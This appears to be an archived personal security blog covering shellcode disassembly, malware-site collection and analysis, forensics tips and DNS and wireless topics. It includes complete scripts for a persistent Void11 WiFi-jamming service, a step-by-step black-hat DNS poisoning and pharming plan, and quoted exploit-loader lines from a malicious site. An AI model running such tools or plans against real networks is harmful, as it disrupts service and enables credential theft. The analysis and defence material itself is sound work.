# a little script to clean up shellcode, parse it, convert to
little-endian, and compile into the smallest wrapper possible.
# based on instruction provided by Lenny Zelster.

# hacked together by
# Andrew Hunt
# 4/19/08
# Copyright 2008 Creative Commons Share-Alike
# http://creativecommons.org/licenses/by-sa/3.0/us/

# this script is very alpha, assuming you will call with a text file
argument. text file should have the unicode pasted in it,
# like `./shellcode_analyzer.sh shellcode.unicodeorhex.strings.file`.
# it comes without any warranties or promises.
#
# user needs to replace the script path and script for unescaping
unicode/hex/other with the path to their own script or an unescaping
routine.
# some replacement suggestions if you don't have a script...
#
# perl -pe 's/\\x(..)/chr(hex($1))/ge'
# perl -pe 's/[\%\\]u(..)(..)/chr(hex($2$1))/ge'

cat $1 | perl -pe "s/\'\+\'//g" | perl -pe 's/\"\+\"//g' | perl -pe
's/\"//g' | perl -pe "s/\'//g" | perl /mnt/sda1/scripts/unescape.pl >
/tmp/test5.bin

cat /tmp/test5.bin | hexdump | awk '{print $2 $3 $4 $5 $6 $7 $8 $9}' |
perl -pe 's/(..)(..)/print("\"\\x".$2."\\x".$1."\"\n")/ge' | grep -P
'^\"'>/tmp/test6.hex

echo "unsigned char shellcode[]="> /tmp/test7.c
cat /tmp/test6.hex >> /tmp/test7.c
echo ";" >> /tmp/test7.c
echo "int main(){}" >> /tmp/test7.c

gcc -c -o shellcode-compiled /tmp/test7.c
objdump -D shellcode-compiled > shellcode.disasm
rm -f /tmp/test*

# optional
less shellcode.disasm

Phish Me

2008-02-29T17:01:00.001-05:00

Last night's NOVASec meeting was an interesting affair. After the presentation by Stratum Security, there was a lively discussion about targeted attacks and how unprepared many organizations are in facing this threat. Intrepidus Group founder Aaron Higbee introduced me to his phishme.com site. Looking over the service, it delivers an essential user training and social engineering testing function by allowing the penetration tester to develop custom targeted emails against a client. It tracks the deliveries, who opens the emails and who clicks the baited links inside, generating a graphical report for delivery to management. This is a great way to gauge the effectiveness of user awareness training programs and identify susceptible users that need retraining. Great product, Intrepidus!

Idea for End-point Javascript Obfuscation Blocking

2008-02-23T11:08:00.001-05:00

I was fortunate enough to attend a presentation by Daniel Peck, of CaffieneMonkey fame, on the characteristics of the javascript obfuscation attack. What struck me the most about the presentation were the graphs Mr. Peck included comparing the object characteristics of malicious scripts. While most scripts have a high number of interfacing calls (doc.write, writeln, print, alert, etc) with rather short 'string' content in their tags to direct the content loading, malicious scripts have relatively few interfacing objects with HUGE strings objects (upwards of 80-90% of the script). Over the graphs of scanned sites he showed, it seems clear this is consistent across malicious v non-malicious sites. If this statistical analysis could be integrated into a plug-in, it would make for a rudimentary, yet effective barrier to obfuscated iframes and droppers. The plug-in would have to prevent script execution based on a user-defined ratio or percentage of calls/string content.

With a skeleton plug-in and the statistical analysis code in CaffieneMonkey open source, integration of the two should be possible.

Getting Started

2007-12-23T03:29:00.000-05:00

I finally decided to stop spending my time as a web administrator and let Google do the legwork for me. I'd rather be accepting malicious connections on my honeypot anyway and not worrying about whether my content engine is hacked. I'll be transitioning my existing content here in the coming weeks.

Reconstituting Base64 Attachments

2007-06-13T03:00:00.000-04:00

Originally from ISC's Pedro Bueno, http://isc.sans.org/diary.html?storyid=2955&dshield=a5b4c2b44d94b5810c38069ca8f981d5

perl -MMIME::Base64 -e 'print decode_base64(join("", <>))' badfile.exe.file

Creating a Void11 Counter-Offensive Wi-Bomb on Auditor

2007-05-04T03:00:00.000-04:00

Requirements:

Auditor ISO (http://mirror.switch.ch/ftp/mirror/auditor/ )
Laptop with available hard-drive for installation. Recommend 256+ MB RAM and P4 or better CPU. Must have PCMCIA slot. On-board NIC for external connectivity and management if desired.
SMC 2532W-B Intersil Prism-based WiFi card. Also has external antennae jacks.
9dBi omni- or dual semi-directional patch antennas

Boot up Auditor and perform a permanent installation to the hard drive. Create these files on the system, then run the installation file. Test by executing '/etc/init.d/void11 start' with the SMC card inserted. Reboot and verify operation with a test of a "rouge" AP and an independent client attempting to connect. Best performed when you allow the client to connect, do a perpetual ping, then turn on your Wi-bomb appliance and watch it die.

You can later integrate known-good access points into the appliance by creating a matchlist and adjusting the OPTIONS parameter in the 'void11' script to include "-l /path/to/matchilst". See William Hidalgo's excellent writeup for more inforamtion on formatting the matchlist file.

References:

William Hidalgo's well-written article on using Void11 as a counter-offensive tool to protect networks : "Void11 Rouge Access Point Counter Offense" (http://remote-exploit.org/research/void11rougeaccesspoint.html )

Scripts:

void11_installer.sh

#!/bin/sh
cp -f void11 /etc/init.d/
chmod 755 /etc/init.d/void11
cp -f void11.cron /etc/cron.daily/void11
chmod 755 /etc/cron.daily/void11
ln -s /etc/init.d/sysklogd /etc/rc.boot/S65syslog
ln -s /etc/init.d/void11 /etc/rc.boot/S99void11
ln -s /etc/init.d/void11 /etc/rc6.d/K15void11
ln -s /etc/init.d/void11 /etc/rc0.d/K15void11
ln -s /etc/init.d/sysklogd /etc/rc0.d/K10syslog
ln -s /etc/init.d/sysklogd /etc/rc0.d/K10syslog
touch /var/log/void11
chmod 600 /var/log/void11
echo Now that installation is complete, run Void11 by issuing
echo
echo /etc/init.d/sysklogd start
echo /etc/init.d/void11 start

voider.sh

#!/bin/sh
#rm -Rf /etc/pcmcia
#cp -R /etc/pcmcia-hostap /etc/pcmcia
rm -f /etc/pcmcia/wlan-ng*
killall -HUP cardmgr
cardctl eject
sleep 1
cardctl insert
sleep 2
iwpriv wlan0 hostapd 1
iwconfig wlan0 mode master
sleep 1
void11_hopper > /dev/null &
void11_penetration -t 1 -d 10 wlan0

void11.cron

#!/bin/sh

test -x /usr/local/bin/void11_hopper || exit 0
test -x /usr/local/bin/void11_penetration || exit 0
/etc/init.d/void11 restart

void11

#!/bin/sh

PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin

OPTIONS="-t 1 -d 10 wlan0"

PIDFILE=/var/run/void11_penetration.pid
RIDFILE=/var/run/void11_hopper.pid
DAEMON=/usr/local/bin/void11_penetration
RAEMON=/usr/local/bin/void11_hopper

case "$1" in
start)
echo -n "Starting WiFi blackout service: void11"

if [ ! -x $RAEMON ]; then
echo "void11_hopper script missing - not starting"
exit 1
fi
if [ ! -x $DAEMON ]; then
echo "void11_penetration binary missing - not starting"
exit 1
fi
rm -f /etc/pcmcia/wlan-ng*
killall -HUP cardmgr
cardctl eject
sleep 1
cardctl insert
sleep 2
iwpriv wlan0 hostapd 1
iwconfig wlan0 mode master
sleep 1
$RAEMON > /dev/null &
$DAEMON $OPTIONS > /var/log/void11 &
echo "."
;;

stop)
echo -n "Stopping WiFi blackout service: void11"
killall void11_penetration
sleep 2
killall void11_hopper
sleep 2
echo "."
;;

reload)
$0 restart
;;

restart|force-reload)
$0 stop
sleep 2
$0 start
;;

*)
echo "Usage: /etc/init.d/void11 {start|stop|reload|restart|force-reload}" >&2
exit 1
;;
esac

exit 0

Better WHOIS Lookups

2007-03-27T03:00:00.000-04:00

Origin AS/WHOIS lookups via scripts, use DNS-based lookups at Team Cymru:

nslookup -type=TXT 31.108.90.216.origin.asn.cymru.com

Javascript Decoding

2007-02-21T03:00:00.000-05:00

Some excellent articles:

https://isc2.sans.org/diary.html?storyid=1917

http://isc.sans.org/diary.html?storyid=2268

Or just override the write and evaluation features with custom functions, slap them on the front, and run them through spidermonkey.

Finding Files and Counting Lines at the Windows Command Prompt

2007-02-14T03:00:00.000-05:00

An article about some Windows basics that are rather important in the forensics world.

http://isc.sans.org/diary.html?storyid=2244

Determining USB Keys in Windows

2007-02-08T03:00:00.001-05:00

reg query "\\%1\HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR"

Perl Scripting to Decode Encoded or Escaped Pages

2007-02-08T03:00:00.000-05:00

Basic form

> cat file.htm | perl -pe 's///ge'

Now fill in the searches and substitution functions between the slashes. Final form:

> echo "test1%202%203%20" | perl -pe 's/\%(..)/chr(hex($1))/ge'
test1 2 3

Security Apache/PHP

2007-02-05T03:00:00.000-05:00

http://isc.sans.org/diary.html?storyid=2163

Searching for a File of a Given Date in DOS

2007-02-01T03:00:00.000-05:00

Important in Windows forensics work. Care of Mike S.

The date to check is xx/xx/xxxx. The command to do the search would be something along these lines:

dir c:\*.* /a /t:c /s | find "xx/xx/xxxx" > results.txt

Cursory Malware Analysis Techniques with Common Tools

2007-01-31T03:00:00.000-05:00

Review of using BackTrack to do cursory evaluation and tracing of captured malcode.

Get BackTrack

Get the BackTrack ISO from http://www.remote-exploit.org/backtrack_download.html and burn it to CD.

Getting Started

Boot your machine with Backtrack. At the command prompt screen, login as root. Issue commands to setup the network and start X windows.

slax ~ # ifconfig eth0 up
slax ~ # dhcpcd -i eth0

Confirm you have a valid IP address.

slax ~ # ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:06:5B:A1:9F:06
inet addr:192.168.1.151 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::206:5bff:fea1:9f06/64 Scope:Link
UP BROADCAST NOTRAILERS RUNNING MULTICAST MTU:1500 Metric:1
RX packets:117652 errors:0 dropped:0 overruns:1 frame:0
TX packets:12714 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:22401571 (21.3 Mb) TX bytes:2096818 (1.9 Mb)
Interrupt:18 Base address:0xc800

Start graphical mode.

slax ~ # startx

The machine will now enter graphical mode. When done, open a command window by clicking the black computer screen icon at the bottom left of the screen.

Navigate to /mnt. See what is attached to the machine.

slax ~ # cd /mnt
slax mnt # ls
floppy/ hda1/ hda5/ hdb1/ hdc_cdrom/ hdd_cdrom/ live/

Insert your USB stick and mount it.

slax mnt # ls
floppy/ hda1/ hda5/ hdb1/ hdc_cdrom/ hdd_cdrom/ live/ sda1_removable/
slax mnt # mkdir sd
slax mnt # mount /dev/sda1 /mnt/sd
slax mnt # ls
floppy/ hda1/ hda5/ hdb1/ hdc_cdrom/ hdd_cdrom/ live/ sd/ sda1_removable/

Confirm you are mounted to /mnt/sd

slax mnt # mount
...
/dev/sda1 on /mnt/sd type vfat (rw)

Now that you're set up, the next page will continue with collection of the malcode samples.

{mospagebreak}

Collecting Samples

Enter the drive. Create a new folder for your analysis work.

slax mnt # cd sd
slax sd # mkdir www.malcodedomain.com
slax sd # ls
www.malcodedomain.com/

Enter your new directory. Copy in the wget retrieval script for use with this analysis.

slax sd # cd www.malcodedomain.com
slax www.malcodedomain.com # cp ../get_links.sh .
slax www.malcodedomain.com # ls
get_links.sh*

Here is what the get_links.sh file looks like.

slax infotechnow.com # cat get_links.sh
#!/bin/bash
for i in `cat $1`; do
# wget to pull down files
# -t1 retry once
# -T20 wait 20 seconds, then timeout and move on
# -x use directory structure. Prevents overwrites.
# -U use the common Internet Explorer user agent string for two reasons. 1) Helps elude detection by perpetrator that their code has been compromosed. 2) some malcode compares the user agent and does not attempt exploit on non-compatible clients, defeating code collection.
# --save-cookies might want these
echo $i;
wget -t 1 -T 20 -x -U "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" --save-cookies=cookies.txt "$i" | tee wget_log.txt;
done;
ls -R

Create a file with a list of the URIs that you will investigate. Remember to be inventive with how you search, as some minor modifications may yield greater returns than the initial query. An example would be to pull any possible directory listings to expand target scope. Another would be to search for number variants for a file, say wxp521.bad. Look for wxp522.bad and others between 500-550. Try to pull dynamic pages (asp, php) without their arguments as well.

slax www.malcodedomain.com # vi links
slax www.malcodedomain.com # cat links
http://www.malcodedomain.com/dir/dir/detected_bad_page.asp?maybe_you_have_args
http://www.malcodedomain.com/dir/dir/detected_bad_page.asp
http://www.malcodedomain.com/dir/dir
http://www.malcodedomain.com/dir/
http://www.malcodedomain.com
http://relatedmaldomain.cc
http://relatedmaldomain.cc/dir/
http://relatedmaldomain.cc/dir/badfile.js

Run the get_links script to do the initial pull. Files will be saved in the same directory hierarchy they had on the target server.

slax www.malcodedomain.com # ./get_link.sh links
slax www.malcodedomain.com # ls
cookies.txt* get_links.sh* links* wget_log.txt* www.malcodedomain.com/

As you see, the script creates a log for wget errors, records the cookies, and creates the site directory with appropriated result files in it.

On the next page, we'll explore gathering the online records to identify owners and possible contacts for future action.

{mospagebreak}

Gathering Records

To do an investigation, you need to know about the site you are targeting. WHOIS and DNS are good sources to gather some information.

Retrieve the DNS records for query resolution and reverse resolution of the target domain. 'example.net' is used as an example.

slax www.malcodedomain.com # dig example.net | tee DNS_example.net

; <<>> DiG 9.3.1 <<>> example.net
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 2663 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 5, ADDITIONAL: 5 ;; QUESTION SECTION: ;example.net. IN A ;; ANSWER SECTION: example.net. 60 IN A 11.22.33.44

;; AUTHORITY SECTION:
example.net. 86400 IN NS ns4.mydyndns.org.
example.net. 86400 IN NS ns5.mydyndns.org.
example.net. 86400 IN NS ns1.mydyndns.org.
example.net. 86400 IN NS ns2.mydyndns.org.
example.net. 86400 IN NS ns3.mydyndns.org.

;; ADDITIONAL SECTION:
ns1.mydyndns.org. 79664 IN A 63.208.196.92
ns2.mydyndns.org. 79314 IN A 204.13.249.82
ns3.mydyndns.org. 36138 IN A 204.13.250.82
ns4.mydyndns.org. 80774 IN A 213.155.150.206
ns5.mydyndns.org. 80774 IN A 63.208.196.93

;; Query time: 168 msec
;; SERVER: 192.168.1.4#53(192.168.1.4)
;; WHEN: Wed Jan 31 14:19:09 2007
;; MSG SIZE rcvd: 231

slax www.malcodedomain.com # dig -x example.net | tee DNS_example.net_ptr

; <<>> DiG 9.3.1 <<>> -x example.net
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 26216 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0 ;; QUESTION SECTION: ;net.example.in-addr.arpa. IN PTR ;; AUTHORITY SECTION: in-addr.arpa. 10800 IN SOA A.ROOT-SERVERS.NET. dns-ops.ARIN.NET. 2007013116 1800 900 691200 10800 ;; Query time: 94 msec ;; SERVER: 192.168.1.4#53(192.168.1.4) ;; WHEN: Wed Jan 31 14:19:29 2007 ;; MSG SIZE rcvd: 113

As you can see, 'example.net' is a dynamic hosted site with no return PTR record. Now do an in-addr.arpa query on the IP to determine the ISP.

slax www.malcodedomain.com # dig -x 11.22.33.44 | tee DNS_11.22.33.44

; <<>> DiG 9.3.1 <<>> -x 11.22.33.44
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 36217 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2 ;; QUESTION SECTION: ;44.33.22.11.in-addr.arpa. IN PTR ;; ANSWER SECTION: 44.33.22.11.in-addr.arpa. 86400 IN PTR user-xx.cable.mindspring.com.

;; AUTHORITY SECTION:
254.133.66.in-addr.arpa. 10951 IN NS scratchy.earthlink.net.
254.133.66.in-addr.arpa. 10951 IN NS itchy.earthlink.net.

;; ADDITIONAL SECTION:
itchy.earthlink.net. 59942 IN A 207.69.188.196
scratchy.earthlink.net. 74609 IN A 207.69.188.197

;; Query time: 79 msec
;; SERVER: 192.168.1.4#53(192.168.1.4)
;; WHEN: Wed Jan 31 14:21:18 2007
;; MSG SIZE rcvd: 179

Looks like an Earthlink cable customer. Now pull the WHOIS information for the domain and IP.

slax www.malcodedomain.com # whois 11.22.33.44 | tee WHOIS_11.22.33.44
EarthLink, Inc. ERLK-CBL-TW-WEST (NET-11-22-33-0-1)
11.22.33.0 - 11.22.255.255
EARTHLINK, INC ERLK-TW-HAWAII01 (NET-11-22-33-0-1)
11.22.33.0 - 11.22.255.255

# ARIN WHOIS database, last updated 2007-01-30 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

Notice the first draw only came up with referring netblock information. Replace the original query with the netblock to get usable information.

slax www.malcodedomain.com # whois NET-11-22-33-0-1 | tee WHOIS_11.22.33.44
CustName: EARTHLINK, INC
Address: 1375 PEACHTREE STREET, LEVEL A
City: ATLANTA
StateProv: GA
PostalCode: 30309
Country: US
RegDate: 2006-11-17
Updated: 2006-11-17

NetRange: 11.22.33.0 - 11.22.255.255
CIDR: 11.22.33.0/20
NetName: ERLK-TW-HAWAII01
NetHandle: NET-11-22-33-0-1
Parent: NET-11-22-33-0-1
NetType: Reassigned
Comment:
RegDate: 2006-11-17
Updated: 2006-11-17

OrgAbuseHandle: ABUSE60-ARIN
OrgAbuseName: ABUSE TEAM
OrgAbusePhone: +1-404-815-0770
OrgAbuseEmail: abuse@abuse.earthlink.net

OrgTechHandle: ELNK-ORG-ARIN
OrgTechName: EarthLink, Inc.
OrgTechPhone: +1-404-815-0770
OrgTechEmail: arin_tech@lists.corp.earthlink.net

# ARIN WHOIS database, last updated 2007-01-30 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

slax www.malcodedomain.com # whois example.net | tee WHOIS_example.net

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: EXAMPLE.NET
Registrar: GO DADDY SOFTWARE, INC.
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS1.MYDYNDNS.ORG
Name Server: NS2.MYDYNDNS.ORG
Status: clientDeleteProhibited
Status: clientRenewProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 15-jul-2006
Creation Date: 30-dec-2003
Expiration Date: 30-dec-2013

>>> Last update of whois database: Thu, 01 Feb 2007 00:22:57 UTC <<< ... Registrant: EXAMPLE xxxxxx St xxxxxxx, xx nnnnn United States Registered through: GoDaddy.com, Inc. (http://www.godaddy.com) Domain Name: EXAMPLE.NET Created on: 30-Dec-03 Expires on: 30-Dec-13 Last Updated on: 09-Apr-04 Administrative Contact: EXAMPLE xx@xx.xxx xxxxxx St xxxxxxx, xx nnnnn United States 5555555555 Fax -- Technical Contact: EXAMPLE xx@xx.xxx xxxxxx St xxxxxxx, xx nnnnn United States 5555555555 Fax -- Domain servers in listed order: NS1.MYDYNDNS.ORG NS2.MYDYNDNS.ORG

The target is confirmed to be a dynamic domain. The target server is hosted on a cable link through Earthlink. The data even has contact information, though this may be falsified in the case of a malicious domain.

Repeat this process for each newly discovered IP and domain.

On the next page, we explore basic methods to analyze collected malware.

{mospagebreak}

Analysis

Now we switch to a live example to demonstrate the rest of the process. The following was taken during an investigation of infotechnow.com and its hacked referral to a malcode hosting site.

slax infotechnow.com # cd /mnt/sd/infotechnow.com

The original detection was an inserted code redirect at infotechnow.com. Let's start there.

slax infotechnow.com # cd www.infotechnow.com
slax www.infotechnow.com # ls
shopping/
slax www.infotechnow.com # cd shopping
slax shopping # ls
default.asp* index.html* shopdisplaycategories.asp*

Look at each file and determine the malcode.

slax shopping # cat shopdisplaycategories.asp

meta equiv="Content-Language" content="en-us">
...

The code is pretty long, so here is the pertinent part. Notice that encoded script in the middle of the formatted HTML code. Here's the specific code we seek.

a href="hp://www.infotechnow.com/shopping/shopdisplayproducts.asp?id=3&cat=Floppy%2C+Zip">Floppy, Zip
a href="http://www.blogger.com/shopping/shopdisplaycategories.asp?id=262&cat=GPS%3Cscript+src%3D%22%20http%3A%2F%2Fijk%2Ecc%2FE%2FJ%2EJS%22%3E%3C%2Fscript%3E".GPS.script src="http://ijk.cc/E/J.JS"../script../a../span..a href="http://www.blogger.com/shopping/shopdisplaycategories.asp?id=193&cat=Hard+Drives".Hard Drives./a.

The user clicks on a link for GPS units, and is redirected to malcode host site 'ijk.cc' to execute file 'j.js'. Add this to the links list and grab it.

Now navigate to your new captured file and analyze it with 'strings'.

slax infotechnow.com # cd ijk.cc
slax ijk.cc # cd e
slax e # ls
ff104/ ff154/ ie_onload.js* index.html* isci/ j.js* j_js_decodes* ms06044/ vml/
slax e # strings j.js | tee STRINGS_j_js

Read through the output and note interesting features in your report. Collect any referred URIs or scripts, add them to the links list, and collect them. Examples of a few interesting items in j.js follows:

ExecScript("http://" + server_addr + "/E/isci/isci_my.js");
ExecScript("http://" + server_addr + "/E/ff154/ff154.js");
ExecScript("http://" + server_addr + "/E/ff104/ff104.js");
var my_src = 'http://'+server_addr+'/E/ms06044/ww.js';
ExecIframe('http://'+server_addr+'/E/ms06044/ms06044.htm');
ExecIframe('http://'+server_addr+'/E/vml/vml.htm');
document.write("/E/ie_onload.js'><"+"/script>");

And so on. As mentioned, add discovered files to the links list and grab them.

Analysis helps you identify files, directories and other servers to pursue. You may be drawn to other sites, files and directories. Be persistent and follow all of the available branches.

Rinse and repeat.

Network Disk Imaging

2007-01-07T03:00:00.000-05:00

From SANS Internet Storm Center, but I lost the link.

Reader Bob Hart submits the following tip, which is
very useful and surprisingly powerful for its size...

I have used the following on a Suse SLES 9 system to
make five exact copies of my original server.

1. On the new server insert the Installation CD and
boot to Rescue mode.
2. Use root to login at the "Rescue" prompt.
3. Run the following commands:

Ê
# ifconfig eth0 192.168.1.100 netmask
255.255.255.0 up
# ping -c 192.168.1.101
# netcat -l -p 9876 | dd of=/dev/cciss/c0d0

The ping command simply checks connectivity to
existing server. Then, on the existing server...

1. Login as root
2. Run

# dd if=/dev/cciss/c0d0 bs=4M |netcat
192.168.1.100 9876

Fun with Windows Netstat

2006-12-05T03:00:00.000-05:00

A most excellent ISC article by Skoudis. Unfortunately, I lost the link.

Fun With Windows Netstat (NEW)

Published: 2006-12-05,
Last Updated: 2006-12-05 15:25:10 UTC by Ed Skoudis (Version: 3(click to highlight changes))

I've often lamented the fact that Windows does not have a built-in lsof-like tool. On Linux and UNIX, lsof gives all kinds of details about what various processes are up to. Sure, we've got the Microsoft Sysinternals Process Monitor tool, which is really cool, but is not built in. And, of course, Windows doesn't include a built-in sniffer…

One technique that I've been using a lot in incident handling, vulnerability assessment, malware analysis, and other sysadmin work over the last few months involves the traditional, humble netstat tool. Although netstat is limited, I've found a specific use of it to be tremendously helpful. Here are some scenarios.

Fellow handler Mike Poor and I were at a client site, and Mike was doing a network scan. I had one of the client's laptops, on which we could install no additional software. I wanted to see when Mikey's wide-ranging scan reached my box, which did have an open port. Here's what I ran:

C:\> netstat –na 1 | find "[Scan_Host_IP_Addr]"

The netstat command, used this way, shows TCP and UDP port activity. The –n means to list numbers. The –a indicates that we want all connections and listening ports. In Windows netstat, the 1 means we want to run every second, repeatedly dumping the output on standard out. That's a really nice feature of Windows netstat, because we can have it run continuously (every second) and scrape its output for what we want. And, here we are looking through our output with the find command to see an indication of when Mike's box had accessed ours. Note that I'm using find here, but another alternative would be the findstr command. The find command can locate strings nicely, but findstr can process regular expressions. I believe in using the appropriate tool for the job, and these simple searches work just fine with find. If you want regexp stuff, use the more powerful findstr command. Anyway, because the 3-way handshake or an actual connection will likely last more than 1 second, this technique will work. Sadly, the technique does not work to capture sub-1-second events. As Mikey continued the scan… Bingo! We could see with 1-second accuracy when it reached my box.

I've used this technique elsewhere as well. A gentleman taking the SANS Security 504 class had a dilemma. He was seeing a weird ICMP Host Unreachable message in his network. When he looked at the destination address, it was going from his router back to his Domain Controller. So, his DC was pushing out a packet to a machine that his router couldn't reach. But, what process on his DC was sending this packet? On the Domain Controller, we ran:

C:\> netstat –nao 1 | find "[Dest_IP_Addr]"

Here, I've added the –o flag, which makes Windows netstat print the PID. You can then look up that PID using "wmic process list brief", "tasklist", or, if you insist, Task Manager (yuck!). Then, you can see what process is emitting that packet, provided that it is using the TCP or UDP stack of Windows to send it, and that it takes at least a second. Note that netstat also offers the –b flag, which makes it show the EXE and its associated DLLs that are using TCP and UDP ports. However, I didn't use –b here, because it seriously hurts performance. For whatever reason, it takes netstat a lot of CPU cycles to get the EXE and DLL info, cycles that we cannot spare on a Domain Controller. And, running "netstat –naob" every second would be a serious drain on processor resources.

Sadly, the -o and -b options in netstat are not available in Windows NT and 2000. As far as I'm concerned, those older Windows are barely manageable at all. WinXP and 2003 are much better, and netstat supports -o and -b in them, to say nothing of wmic, tasklist, taskkill, etc.

Here's another one. We were working on an investigation where an evil process would start up, and eventually (not instantly) listen on TCP port 2222. We wanted to know when it started listening, so we ran:

C:\> netstat –na 1 | find "2222"

And, here's one final one for you. I was working on an investigation, and we had a process listening on a given TCP port (let's say, for example, it was TCP port 4444). We wanted to know when the bad guy connected to it. We ran:

C:\> netstat –na 1 | find "4444" | find "ESTABLISHED"

This will print nothing until the output of netstat includes an established connection on port 4444. So, with approximately 1-second accuracy, we were able to see when someone connected to the port, knowing that our bad guy had come calling. Also, this output includes the source IP address connected to the port, a helpful thing in an investigation.

Now, obviously you could do all of this with a sniffer, with more accuracy and detail. But, netstat is built-in, and these command are easy and quick to type.

--Ed Skoudis.
Handler on Duty
Intelguardians

Malware Analysis Toolkit

2006-10-26T03:00:00.000-04:00

http://isc.sans.org/diary.php?storyid=1801

Checking for Null Sessions

2006-10-13T03:00:00.001-04:00

> net use \\host "" /u:""

Tells you if the Windows server is vulnerable to further attacks based on null sessions over SMB.

DNS Transfer Enumeration

2006-10-13T03:00:00.000-04:00

Useful for testing NIDS sigs and network footprinting.

> nslookup

server

ls -d

Uses for a DNS Cache Poison

2006-07-06T03:00:00.000-04:00

A short-lived targeted attack (black hat):

Identify a vulnerable DNS server upstram from your target.
Poison the target's upstream DNS server for a common web service they access. Broad scope (e.g. tsp.gov, google.com) or narrow scope (e.g. some.project.page.contractor.com).
Throw up a web server that looks reasonably like the original. Have some nasty links/exploits in tehre. Entice the user to click or enter information like logins for the original site. Collect data. Hack clients. This is the 'pharming' concept.
Natural end: simply stop poisoning the upstram server. The attack will end when the caches refresh the old data.
Quicker end: re-poison (or un-poison) the upsteam cache with the correct address.

Ideas for defense (white hat):

Determine the scope of impact

Create s script to do non-recursive lookups of all DNS cache servers for the suspect domain all the way to the network border (and maybe beyond into the upstream if possible). Aggregate the data for analysis.
Parse the data and identify cache servers that do not resolve to the expected set of IP addresses.

What's poisoned?

Reverse-DNS the suspected poisoned IP. Discovering what its PTR record is may reveal useful information.
Use an independent source (not the targeted network) to resolve the suspect domain for "real" IP addresses. Compare this to the data set.
Identify cache servers that do not resolve correctly.

Remediation

Determine the root of the poison through TTL and DNS forwarder analysis of the cache servers. Get as close to the top as possible.
Clear caches, starting at the border, and working inward. As cache requests are made during the flush process, the remediation will be helped along by pulling the now-correct data from the upstream caches. Conversely, starting at the bottom leaves caches vulnerable to reinfection from upstream servers.
If you cannot determine the poison's root, or determine that it is upstream in or beyond your ISP, consider redirecting to other upstream DNS forwarders until the main feeds are fixed. Ask the ISP for assistance if necessary.

Long term

Consider shifting the border (top level) DNS cache forwarders from time to time or even at regular intervals in rotation. It may change the dynamics of your network infrastructure enough to make poisoning more difficult for the attacker.
Ensure DNS engine patches are up-to-date. Demand the same of your upstream feeders.

Encrypted Malware and Code Reusability

2006-02-12T03:00:00.000-05:00

A decent article walking through a malware analysis.

http://isc.sans.org/diary.html?storyid=2223

Car Webcam Surveillance System

2005-12-20T03:00:00.001-05:00

Main Idea: LINUX-based Web Cam Recorder

The idea is to have an on-board laptop with web server to snap pics with the webcam every few seconds and record the data to the hard drive. A wireless connection at the house and server will provide for syncronization of the data when the car returns into the range of the base AP.

Acquire an old laptop with a hard drive and USB port.
Get a USB web camera. Mount it to the back of the car by the center brake light. Run the cable to the trunk. Get a USB extension cable if nec.
Get a wireless card that is compatible with LINUX. Recommended, any Prism-based 802.11 card or Orinoco Gold. Prism 802.11g chips are supported in LINUX, but the driver setup can be involved. Do some research and be prepared.
Get a DC/AC power converter. Run the DC power connect from the lighter or other car outlet back to the trunk of the vehicle.
If the battery of the laptop is not operable, a small UPS may be desirable for use. Disable the alarms through the console setup, if available. APC brand recommended. Make sure it has "smart" firmware.
Load LINUX to the laptop. Use a journaling file system, like xfs or reiserfs as the machine will probably experience frequent power loss. Software required: apache, cron, scp, webcam image capture software or scripts, wireless drivers/scripts.
Setup the wireless connection. It can be configured in any way, so long as you can connect to it from another machine and view the apache dir with the webcam captures.
Setup LINUX power management for no power alert alarms. Preferably, it will have no GUI (init:3) and no sound drivers as it can get distracting. Set the power management software to shut the system down at 5% on-board battery power. If using a UPS in lieu of an on-board battery, use NUT or APCUPSD and set for shutdown at 3% power. Or you can use both. :)
Setup webcam capture script/app to collect the image every few seconds. Save it to a local directory in the web hierarchy.

Option: Wireless Sync to a base server

Ensure the wireless settings do not allow the card to "roam" to any other APs or ad-hoc networks. It should only connect to the base AP.
The base server in the house requires SSH. Create an account for the laptop to dump files to. Generate keys on the laptop and perform the exchange so that the laptop can connect to it's account on the server automatically with SCP.
Create a script that will scp all files in the webcam directory to the base server, then delete them if successful.
Schedule scp script to execute every minute in cron. Throw output to /dev/null.

An ftp client could be used for this exercise, but is not recommended as it is not encrypted.

Alternate Setup: Bootable LINUX CD

This configuration maximizes the HD space available for recording. Follow the above with the following modifications:

Acquire an old laptop with hard drive, CD drive and USB port.
Get a USB pen drive (flash drive, thumb drive). Recommend 1GB space.
Burn a copy of a bootable linux CD. Knoppix, Debian, etc.
Modify the BIOS of the laptop. set CDROM as the boot device. set power settings to power it ON in the event of a power failure. Save and exit.
Boot to the LINUX CD. Establish the settings you want and save to the USB drive.

You will have to run some rc scripts from the usb drive at bootup to ensure that the web server, sync scripts, and wireless card are running when the machine powers up.

Clustered Intruson Detection System

2005-12-20T03:00:00.000-05:00

Ideas for creating a scalable architecture for very large enterprises.

Create a LINUX-based IDS appliance with clustering enabled.
After establishment of first node, additional nodes can be dropped in and configured directly into the cluster.
Added nodes will pull configurations from existing nodes and self-configure after initial node config.
Once finalized, nodes will form cluster and share CPU, memory, and application space. This provides drop-in scalability merely by adding more appliance units and configuring.
Incoming spanned traffic will have to be load balanced among promiscuous NICs.

Securing Wireless: Presentation Notes

2005-12-15T03:00:00.000-05:00

Course 1 - Implementing Wireless Security

Agenda

Standards Overview
